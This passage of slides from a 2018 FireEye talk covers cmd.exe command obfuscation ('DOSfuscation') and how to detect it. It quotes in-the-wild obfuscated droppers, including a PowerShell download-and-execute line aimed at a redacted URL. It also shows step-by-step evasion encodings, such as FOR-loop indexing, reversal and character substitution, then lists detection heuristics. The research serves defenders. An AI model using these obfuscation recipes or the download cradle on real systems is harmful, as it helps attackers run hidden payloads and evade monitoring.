  137. 137. • Concatenation examples in the wild (2/3): 137 CmD wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiP PcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) Invoke-Obfuscation payload Payload Obfuscation 1 of 4: Concatenation (ITW 2/3) COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  138. 138. • Concatenation examples in the wild (3/3): 138 cmd.exe /C "cm^d^.^e^x^e /V^ ^/C s^et g^c^=^er^s^&^&s^e^t ^tf=^he^ll^&^&set^ f^a^=^pow^&^&^s^et^ dq^=W^i^n^do^ws^!fa^!^!g^c^!!^t^f^!^v^1^.0^!^fa!^!^gc!!^tf^!^&^&^ ech^o^ iE^X^(^^"iex(neW-OBjecT nEt.webCLiEnt).dowNlOaDstrING('https://REDACTED')^"^)^;^ ^|^ !dq! -^no^p^ ^-^w^i^n^ ^1^ ^-" !dq! == WindowsPowerShellv1.0powershell Payload Obfuscation 1 of 4: Concatenation (ITW 3/3) COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  139. 139. COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.139 https://f.fwallpapers.com/images/funny-bear.jpg Last of ITW… Unseen Techniques Up Ahead!
  140. 140. COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.140 https://f.fwallpapers.com/images/funny-bear.jpg Last of ITW… Unseen Techniques Up Ahead! For the past 9 months I have hunted across: • Public file repositories • Private file repositories • Sandbox execution reports • Endpoint detections for 10+ million endpoints
  141. 141. 141 FOR Score And Seven Obfuscation Techniques Ago… https://www.whitehouse.gov/sites/whitehouse.gov/files/images/first-family/16_abraham_lincoln%5B1%5D.jpg Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  142. 142. 142 Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  143. 143. 143 • cmd /c netstat /ano Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  144. 144. 144 • cmd /v /c netstat /ano • /V • /V:ON • /VERBOSE • /V::::::::::: • /V===== • /V_-/-_ Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  145. 145. 145 • cmd /v /c netstat /ano Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  146. 146. 146 • cmd /v /c netstat /ano #ForCompatibilityReasons #RisthenewC Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  147. 147. 147 • cmd /v /c netstat /ano #ForCompatibilityReasons #RisthenewC Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  148. 148. 148 • cmd /v /r netstat /ano #ForCompatibilityReasons #RisthenewC Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  149. 149. 149 • cmd /v /r netstat /ano https://s3.caradvice.com.au/thumb/1200/630/wp- content/uploads/2014/01/ownerreview-honda-cr-v.jpg Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  150. 150. 150 • cmd /v /r netstat /ano Troll-pportunity ™ Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  151. 151. 151 • cmd Never Gonna Give You Up/vNever Gonna Let You Down/r netstat /ano https://postmediavancouversun2.files.wordpress.com/2016/10/giphy.gif Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  152. 152. 152 • cmd c echo %PATH% /v /r netstat /ano Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  153. 153. 153 • cmd c echo %PATH% /v /r netstat /ano Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  154. 154. 154 • cmd c echo %PATH% /v /r netstat /ano Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  155. 155. 155 • cmd /v /r netstat /ano Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  156. 156. 156 • cmd /v /r "set unique=nets /ao&&…" Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  157. 157. 157 • cmd /v /r "set unique=nets /ao&&FOR %A IN ( ) DO…" n e t s / a o 0 1 2 3 4 5 6 7 Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  158. 158. 158 • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 ) DO…" Payload Obfuscation 2 of 4: FORcoding n e t s / a o 0 1 2 3 4 5 6 7 n COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  159. 159. 159 • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 ) DO…" Payload Obfuscation 2 of 4: FORcoding n e t s / a o 0 1 2 3 4 5 6 7 n e COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  160. 160. 160 • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 ) DO…" Payload Obfuscation 2 of 4: FORcoding n e t s / a o 0 1 2 3 4 5 6 7 n e t COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  161. 161. 161 • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 ) DO…" Payload Obfuscation 2 of 4: FORcoding n e t s / a o 0 1 2 3 4 5 6 7 n e t s t a t / a n o COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  162. 162. 162 • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO…" Payload Obfuscation 2 of 4: FORcoding n e t s / a o 0 1 2 3 4 5 6 7 n e t s t a t / a n o Arbitrary end-of-index delimiter COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  163. 163. 163 • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&…" Appending char at each index (%A) to !final! env var. Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  164. 164. 164 • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%" • ==1337 • EQU 1337 • GEQ 1337 • GTR 1336 https://ss64.com/nt/if.html Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  165. 165. 165 • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%" Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  166. 166. 166 • cmd /v /r "set unique=OnBeFtUsS C/AaToE&&FOR %A IN (1 3 5 7 5 13 5 9 11 13 1 15 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~- 12%" Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  167. 167. 167 • cmd /v /r "set unique=OnBeFtUsS C/AaToE&&FOR %A IN (1 3 5 7 5 13 5 9 11 13 1 15 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~- 12%" Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  168. 168. 168 • cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1 3 5 7 5 13 5 9 11 13 1 15 1337) dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~- 12%" Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • • • • • Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  169. 169. 169 • cMd/v/R"sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1,3;5,7;5,13;5,9;11, 13,1;15,1337)dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~- 12%" Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • • • • Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  170. 170. 170 • cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE && foR %a iN ( 1 3 5 7 5 13 5 9 11 13 1 15 1337 ) dO sEt fINal=!finAl!!uniQue:~ %a, 1!&& iF %a == 1337 CalL %fInAl:~ -12% " Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • • • • Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  171. 171. 171 • ,;cMd;/v;,;/R "sET unIQuE=OnBeFtUsS C/AaToE &&,; foR ;,;%a ,;;iN;,,;( , 1; 3 5 7 5 13 5,,9 11 13 1;;15 1337;,),;,;dO,,;;sEt fINal=!finAl!!uniQue:~ %a, 1!&&;;;iF,, ,%a;;,==,,;1337,;;,CalL;,,;%fInAl:~ -12% " Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • Comma & semicolon • • • Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  172. 172. 172 • ,;c^Md;/^v;,;/^R "sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE &&,; fo^R;,;%^a,;; i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,;;s^Et fI^Nal=!finAl!!uni^Que:~ %^a, 1!&&;;i^F,,%^a;,=^=,;13^37,;Ca^lL;,%fIn^Al:~ -^12%" Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • Comma & semicolon • Caret • • Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  173. 173. 173 • ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a,=^=;13^37,(Ca^lL;%fIn^Al:~ -^12%))" Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • Comma & semicolon • Caret • Parentheses • Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  174. 174. 174 • ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( ,+1; 3 5 7 +5 1^3 +5,,9 11 +1^3 +1;;+15 ^+13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a=^=+13^37,(Ca^lL;%fIn^Al:~ -^12%))" Invoke-DOSfuscation functions also wrap all the building block techniques into each input command… • Random case • Whitespace (-/+) • Comma & semicolon • Caret • Parentheses • Explicit signing Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  175. 175. 175 Troll-pportunity ™ Payload Obfuscation 2 of 4: FORcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  176. 176. • cmd /v /r "set reverse=ona/ tatsten&&FOR /L %A IN (11 -1 0) DO set final=!final!!reverse:~%A,1!&&IF %A==0 CALL %final:~-12%" • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%" 176 FORcoding Reverse Payload Obfuscation 3 of 4: Reversal Reversing is similar to FORcoding, but has simpler indexing with FOR loop's /L argument. COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  177. 177. • cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%" • cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%" 177 Payload Obfuscation 3 of 4: Reversal FORcoding Reverse Reversing is similar to FORcoding, but has simpler indexing with FOR loop's /L argument. COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  178. 178. • cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%" 178 • ==1 • EQU 1 • LEQ 1 • LSS 2 https://ss64.com/nt/if.html Payload Obfuscation 3 of 4: Reversal COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  179. 179. • cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%" 179 Payload Obfuscation 3 of 4: Reversal C:> echo %final% !final!netstat /ano C:> echo %final:~-12% netstat /ano COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  180. 180. • cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~7%" 180 Payload Obfuscation 3 of 4: Reversal C:> echo %final% !final!netstat /ano C:> echo %final:~7% netstat /ano COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  181. 181. • cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:*final!=%" 181 C:> echo %final% !final!netstat /ano C:> echo %final:~7% netstat /ano C:> echo %final:*final!=% netstat /ano Payload Obfuscation 3 of 4: Reversal COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  182. 182. • cmd /v /r "set command=netstat /ano&&CALL %command%" 182 Payload Obfuscation 4 of 4: FINcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  183. 183. • cmd /v /r "set command=neZsZaZ /ano&&CALL %command%" 183 Payload Obfuscation 4 of 4: FINcoding t → Z COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  184. 184. • cmd /v /r "set command=neZsZaZ /ano&&set sub1=!command:Z=t!&&CALL %command%" 184 Z  t Payload Obfuscation 4 of 4: FINcoding t → Z COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  185. 185. • cmd /v /r "set command=neZsZaZ /ano&&set sub1=!command:Z=t!&&CALL %sub1%" 185 Z  t Payload Obfuscation 4 of 4: FINcoding t → Z COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  186. 186. • cmd /v /r "set command=neZsZ7Z /7no&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&CALL %sub2%" 186 Z  t 7  a Payload Obfuscation 4 of 4: FINcoding t → Z a → 7 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  187. 187. • cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%" 187 Z  t 7  a ?  n t → Z a → 7 n → ? Payload Obfuscation 4 of 4: FINcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  188. 188. • cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%" This same command in Out-FINcodedCommand POC: • cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%" 188 Payload Obfuscation 4 of 4: FINcoding • No /V so %var% (not !var!) • • COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  189. 189. • cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%" This same command in Out-FINcodedCommand POC: • cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%" 189 Payload Obfuscation 4 of 4: FINcoding • No /V so %var% (not !var!) • Multiple cmd.exe invocations • COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  190. 190. • cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%" This same command in Out-FINcodedCommand POC: • cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%" 190 Payload Obfuscation 4 of 4: FINcoding • No /V so %var% (not !var!) • Multiple cmd.exe invocations • Layered escaping of && COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  191. 191. • cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%" This same command in Out-FINcodedCommand POC: • cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%" 191 Payload Obfuscation 4 of 4: FINcoding • No /V so %var% (not !var!) • Multiple cmd.exe invocations • Layered escaping of && COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  192. 192. • cmd /v /r "set command=?eZsZ7Z /7?o&&set sub1=!command:Z=t!&&set sub2=!sub1:7=a!&&set sub3=!sub2:?=n!&&CALL %sub3%" This same command in Out-FINcodedCommand POC: • cmd /c "set command=?eZsZ7Z /7?o&&cmd /c set sub1=%command:Z=t%^&^&cmd /c set sub2=%sub1:7=a%^^^&^^^&cmd /c set sub3=%sub2:?=n%^^^^^^^&^^^^^^^&cmd /c %sub3%" 192 • No /V so %var% (not !var!) • Multiple cmd.exe invocations • Layered escaping of && Payload Obfuscation 4 of 4: FINcoding COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  193. 193. OUTLINE State of the Union Obfuscation Obfuscation in the Wild: 3 Case Studies Whose Binary is it Anyway: Obfuscating Binary Names Deep Dive: Character Insertion Obfuscation Deep(er) Dive: Advanced Payload Obfuscation C:> Invoke-DOSfuscation Demo Detecting DOSfuscation 193 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  194. 194. • Please do not use this tool for evil. • FIN7, FIN8 & APT32: Please do not use this tool at all ☺ 194 DISCLAIMER https://github.com/danielbohannon/Invoke-DOSfuscation COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  195. 195. OUTLINE State of the Union Obfuscation Obfuscation in the Wild: 3 Case Studies Whose Binary is it Anyway: Obfuscating Binary Names Deep Dive: Character Insertion Obfuscation Deep(er) Dive: Advanced Payload Obfuscation Invoke-DOSfuscation Demo C:> Detecting DOSfuscation 195 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  196. 196. • Long argument length • High frequency of obfuscation characters: , ; ^ " ( ) • Rare obfuscation of internal commands: • C^AL^^L or ;SET, • Unusual execution flags: • /V or /R (or /^R) • Variable substring and replacement syntax: • %var:~7,1% or !var:~%a,1! or !var:*var=! 196 Detecting DOSfuscation (more details in white paper) https://moviefiednyc.files.wordpress.com/2013/11/e 0006-ace-ventura-pet-detective-512c7fac5d838.png COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  197. 197. • Suspicious sub-command and stdin child process artifacts • FOR loop executes sub-command via separate cmd.exe invocation • Cmd.exe pipeline to add'l binary (e.g. findstr.exe) spawns pre-pipe arguments via separate cmd.exe invocation with these arguments: cmd.exe /S /D /c" set" 197 Detecting DOSfuscation (more details in white paper) Double whitespace No space between /c & " Whitespace after first " COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  198. 198. COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.198 http://smurfitschoolblog.com/wp-content/uploads/2016/10/MissingOutImg_1-900x578.jpg
  199. 199. COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.199 http://smurfitschoolblog.com/wp-content/uploads/2016/10/MissingOutImg_1-900x578.jpg Obfuscation
  200. 200. • Invoke-DOSfuscationTestHarness.psm1 THE module I used to develop detection ideas • Invoke-DosTestHarness • Get-DosDetectionMatch • Released 4000 sample obfuscated commands as .txt & .evtx files for static and dynamic purposes 200 Detecting DOSfuscation – Test Harness FTW! COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  201. 201. • Attackers are using more creative command argument obfuscation techniques • Cmd.exe supports significant obfuscation and encoding capabilities not yet seen in the wild • Defenders must match levels of attacker creativity with detection creativity 201 Key Takeaways COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  202. 202. • FireEye Advanced Practices Team • Nick Carr, Matthew Dunwoody, Ben Withnell • My wife: Paige • 9 months research & hunting (500+ hours) • 320 hours Invoke-DOSfuscation tool development • 100 hours slide/presentation development & 100 hours white paper 202 Credit Where Credit Is Due COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
  203. 203. • Daniel Bohannon • Twitter :: @danielhbohannon • Blog :: http://danielbohannon.com • Code: https://github.com/danielbohannon/Invoke-DOSfuscation • White paper: https://www.fireeye.com/blog/threat- research/2018/03/dosfuscation-exploring-obfuscation-and-detection- techniques.html COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.203 Thanks! Questions?

×